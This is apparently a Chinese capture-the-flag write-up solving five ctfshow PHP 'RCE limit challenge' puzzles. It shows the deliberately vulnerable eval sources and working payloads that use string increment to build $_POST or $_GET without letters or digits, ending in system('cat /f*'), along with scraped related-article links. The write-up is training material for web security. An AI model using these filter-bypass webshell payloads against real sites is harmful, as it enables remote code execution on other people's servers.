CTFshow-RCE极限大挑战
前言
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。
RCE1
源码
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","括号",$code);
$code = str_replace(".","点",$code);
eval($code);
?>
分析
可以看到我们最后执行的是eval,而过滤的只有( 和. ,而php eval函数的作用是把字符串按照PHP代码来计算,比如果我们写入 echo `1` 就会写入1 ,如果我们写入的是一句话木马,就可以成功植入木马,执行rce
payload
code=echo `$_POST[1]`;&1=cat /f*
RCE2
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);if (isset($_POST['ctf_show'])) {$ctfshow = $_POST['ctf_show'];if (is_string($ctfshow)) {if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){eval($ctfshow);}else{echo("Are you hacking me AGAIN?");}}else{phpinfo();}
}
?>分析
基本把能用的都过滤了,只剩下$()_+;[],.=/字符,p神的文章好早之前就提出过,自增rce
一些不包含数字和字母的webshell | 离别歌
思路就是,我们rce需要字母,但字母都过滤了,所以我们就要想办法去构造字母,p神是用
强制连接数组和字符串,数组将被转换成字符串,其值为Array,而我们如果取Array的第[0]个字母的话就是A,而A++就是B,例如:
之后我们可以用 . 把字母拼接起来,
payload
注释有分解。
$_=[].''; //得到Array
$_=$_['/'=='+']; //让[]里的值报错返回0,取Array[0]=A,此时$_=A
$____='_'; //让$____=_,后面容易拼接
$__=$_; //将A赋给$__
$__++;$__++;$__++;$__++;$__++;$__++; //A自增到G,此时$__=G
$____.=$__; //将_和G拼接起来,此时$____=_G
$__=$_; //再将$__还原成A
$__++;$__++;$__++;$__++; //A自增到E,此时__=E
$____.=$__; //E和_G拼接,此时$____为_GE
$__=$_; //再将__换源成A
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //A自增成T此时__=T
$____.=$__; //再拼接成_GET,此时$____=_GET
$_=$____; //为了方便起见,我们把____换成_
($$_[_])($$_[__]); //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可 最后换成一行rce即可
RCE3
源码
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);if (isset($_POST['ctf_show'])) {$ctfshow = $_POST['ctf_show'];if (is_string($ctfshow) && strlen($ctfshow) <= 105) {if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){eval($ctfshow);}else{echo("Are you hacking me AGAIN?");}}else{phpinfo();}
}
?>分析
这个过滤和rce2差不多,但吧1和0给放出来了,也限制了长度<=105,可以看一下这个文章
BSides Noida CTF 2021 Web Calculate_bfengj的博客-CSDN博客
得到NAN再用上面相同的方法获得N,从N开始构造的话长度就比上一个方法少多了,原理还是上一题的自增,试着构造一下,当我是想直接$a[0]的时候,他没有回显,原来是因为现在的NAN还不算字符串,所以后面要在拼接一个例如
就可以得到我们想要的N了,但我我们需要字母才能构造N,就用上一题同样的方法构造出A来,因为0可以用了,所以我们就不用让报错直接用[0]就可以了
然后我们就可以得到N了
之后再跟上一步一样一步一步自增就可以了
payload
注释有解析。
$_=([].[])[0]; //得到Array
$_=($_/$_.$_)[0]; //__=N
$_++; //O
$__=$_.$_++; //拼接PO
$_++;$_++;$_++; //S
$__.=$_;
$_++; //T
$_=_.$__.$_; //拼接_和POST
$$_[0]($$_[1]); //$_POST[0]($_POST[1])RCE4,RCE5
之后就是越来越少的长度,就直接分析一下师傅们的pyload
72位
<?php
$a=_(a/a)[a];//N
++$a;//O
$_=$a.$a++;//PO
$a++;$a++;//R
$_=_.$_.++$a.++$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f*
68位
$_=_(a/a)[_];//N
$a=++$_;//O
$$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]);//巧妙的把两次$_++放在一起$a=_.++$_.$a[$_++/$_++].++$_.++$_//$a直接拼接出_POST $$a[_POST]($$a[_])//$_POST[_POST]($_POST[_])
62位
<?PHP
$_=_(_._)[_];//N //本地使用就用(_._._)[_]
$%FA=++$_;//O
$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);
//将拼接放到同一行,真的太厉害了,我只能感叹一句nbCTFshow-RCE极限大挑战相关推荐
- ctfshow每周大挑战之RCE极限挑战
1.ctf.show每周大挑战之RCE极限挑战 php的eval()解释: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾. return ...
- [极客大挑战 2019]RCE ME 1
[极客大挑战 2019]RCE ME 1 首先打开题目得到: 发现是代码审计 传入的code不能大于40 并且不能包含a到z的大小写字符和1到10的数字 我们可以通过不在这个字符集里的字符进行绕过 可 ...
- 华为徐文伟:后香农时代,面向数学的十大挑战问题
本文为2020年8月28日徐文伟在长沙由中国工业与应用数学学会举办的"数学促进企业创新发展论坛"上的发言 来源:中国科学院院刊 徐文伟 华为技术有限公司董事,华为战略研究院院长 后 ...
- 13th-极客大挑战
文章目录 Web babyupload ezrce 登陆试试 justphp Web babyupload 最基础的文件上传(虽然我还没刷完upload-labs,别骂了 传一个伪造png头的图片马, ...
- 代码优化-之-Base64编码函数的极限优化挑战
代码优化-之-Base64编码函数的极限优化挑战 HouSisong@GMail.com 2007.07.27 tag:速度优化,Base64,CPU缓存优化, ...
- 2020年极客大挑战WEB部分WP
WriteUP Welcome 题目地址: http://49.234.224.119:8000/ 题目描述: 欢迎来到极客大挑战! 访问题目链接,发现405报错. 百度了一下,发现是GET或者POS ...
- 第十届极客大挑战——部分web和RE的WP
第十届极客大挑战--部分web和RE的WP 昨天刚刚搞完湖湘杯和软考,累的一批,,,,湖湘杯的wp就不写了,写写这个wp 这个好像是一个月之前就开始的,打了一个月,不断的放题,题也做了不少,,, 其他 ...
- 奥特linux系统监控,奥特曼知识大挑战答案
奥特曼知识大挑战答案是最近抖音上非常火的测试,主要看用户们对奥特曼的了解度有多少,而且这里的奥特曼还分很多种哦,相信很多小伙伴都不知道吧,那就邀请好友一起来奥特曼知识大挑战答案手机版中测试一下,先做了 ...
- 苹果首任AI总监Ruslan Salakhutdinov:如何应对深度学习的两大挑战?(附视频)
虽然用AI算法可以解决很多问题,但当前还是面临很多局限性和挑战.卡内基梅隆大学教授.苹果首任AI总监Ruslan Salakhutdino认为,当前面对的挑战主要分为以下四大类: 1) 自然语言理解与 ...
最新文章
- mysql内联表格使用索引_【求助】MYSQL表关联内联视图不走索引问题??诡异啊...
- Top-1 Error Top-5 Error
- Aix5.3安装Bash环境
- mac应用开发入门笔记
- mysql不支持emoji表情的问题的解决方法
- python.集合转列表_Python列表、元组、字典、集合
- Hibernate标准查询
- 使用springboot自带 MD5加密
- postman 测试http post的json请求
- 框架学习笔记:Unity3D的MVC框架——StrangeIoC
- 最短路问题的线性规划模型
- Qq也进入鸿蒙系统,鸿蒙系统完善进行中,手机QQ接入HMS不需要后台运行秒收信息...
- 计算机进去bios方式,电脑进入BIOS的两种实用方法
- c语言进程管理,OS进程管理模拟(C语言实现)
- 一文看懂 webpack 的所有 source map !
- 下载百度排行榜音乐的程序(Perl)
- 论文查重字数和重复率有什么关系吗?
- USB/TTL/RS232/RS485
- 通过pyqt5绘制标准正态分布图像并实时显示_20200427_
- 台式电脑用网线可以上网,为什么把网线插到笔记本电脑上就连不上网的问题的解决